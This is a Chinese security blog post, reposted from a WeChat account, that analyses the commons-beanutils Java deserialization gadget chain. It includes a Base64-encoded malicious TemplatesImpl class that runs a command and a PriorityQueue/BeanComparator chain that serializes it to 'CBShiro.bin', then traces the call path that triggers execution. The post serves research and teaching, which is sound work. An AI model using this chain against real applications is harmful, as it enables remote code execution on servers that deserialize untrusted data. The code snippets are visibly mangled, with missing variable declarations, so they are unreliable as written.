java安全 commons-beanutils构造链分析

admin 2022年5月5日14:35:39代码审计评论4 views3402字阅读11分20秒阅读模式

java安全 commons-beanutils构造链分析public static byte[] bytes =Base64.getDecoder().decode("yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEACXRyYW5zZm9y bQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2Fw YWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5l TnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwv eHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNv bS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEA Bjxpbml0PgEAAygpVgcAGwEAClNvdXJjZUZpbGUBAA1FdmlsVGVzdC5qYXZhDAAOAA8HABwMAB0AHgEABGNhbGMM AB8AIAEACEV2aWxUZXN0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUv QWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xl dEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUB ABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1By b2Nlc3M7ACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAMAAsAAAAEAAEA DAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAAEQALAAAABAABAAwAAQAOAA8AAgAJAAAALgACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAABAAoAAAAOAAMAAAASAAQAEwANABQACwAAAAQAAQAQAAEAEQAAAAIAEg== ");


public static void SetFieldValue(Object obj,String fieldName,Object value) throws NoSuchFieldException, IllegalAccessException {obj.getClass().getDeclaredField(fieldName);field.setAccessible(true);field.set(obj,value);}public static void main(String[] args) throws NoSuchFieldException,                  IllegalAccessException, TransformerConfigurationException, InvocationTargetException, NoSuchMethodException, IOException, ClassNotFoundException {new TemplatesImpl();SetFieldValue(obj, "_bytecodes", new byte[][]{bytes});SetFieldValue(obj, "_name", "HelloTemplatesImpl");SetFieldValue(obj, "_tfactory", new TransformerFactoryImpl());//CB链BeanComparator comparator = new BeanComparator();//CC2new PriorityQueue<Object>(2,comparator);queue.add("1");queue.add("2");SetFieldValue(comparator,"property","outputProperties");SetFieldValue(queue,"queue",new Object[]{obj,obj});
ObjectOutputStream objectOutputStream = new ObjectOutputStream(newFileOutputStream("CBShiro.bin"));objectOutputStream.writeObject(queue);objectOutputStream.close();ObjectInputStream objectInputStream = new ObjectInputStream(newFileInputStream("CBShiro.bin"));objectInputStream.readObject();objectInputStream.close();


BeanComparator#compare中52行,可以看见会调用o1对象的property属性的get方法

Object value1 =    PropertyUtils.getProperty(o1, this.property);

java安全 commons-beanutils构造链分析

PropertyUtils.getProperty()让使用者可以直接调用任意 JavaBean 的getter方法,JavaBean 即指符合特定规范 的 Java 类
这里拿CC3前半部分来做测试,CC3直接接触是通过newTransformer来进行命令执行。而在newTransformer的上 层,有一个getOutput

TemplatesImpl#getOutputProperties() -> TemplatesImpl#newTransformer() -        >TemplatesImpl#getTransletInstance() ->TemplatesImpl#defineTransletClasses() - >TransletClassLoader#defineClass()

可以看到在传入进outputProperties之后,就会执行命令

java安全 commons-beanutils构造链分析

在上方中,已经分析完了BeanComparator#compare。现在只需要找到有哪出的readObject调用到了该 compare即可

new PriorityQueue<Object>(2,comparator);queue.add("1");queue.add("2");SetFieldValue(comparator,"property","outputProperties");SetFieldValue(queue,"queue",new Object[]{obj,obj});

该readObject如下

java安全 commons-beanutils构造链分析

跟进heapify()

java安全 commons-beanutils构造链分析

继续跟进siftDown()

java安全 commons-beanutils构造链分析

该comparator也就是刚开始初始化给的comparator

java安全 commons-beanutils构造链分析


而SetFieldValue(queue,"queue",new Object[]{obj,obj});,将queue改成了TemplatesImpl的实例化对象,在这过 程中,queue会赋给x

java安全 commons-beanutils构造链分析

分析到这里,就是妥妥的一个命令执行了

java安全 commons-beanutils构造链分析


关注公众号

 公众号长期更新安全类文章,关注公众号,以便下次轻松查阅



原文始发于微信公众号(moonsec):java安全 commons-beanutils构造链分析

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月5日14:35:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  java安全 commons-beanutils构造链分析 http://cn-sec.com/archives/974317.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: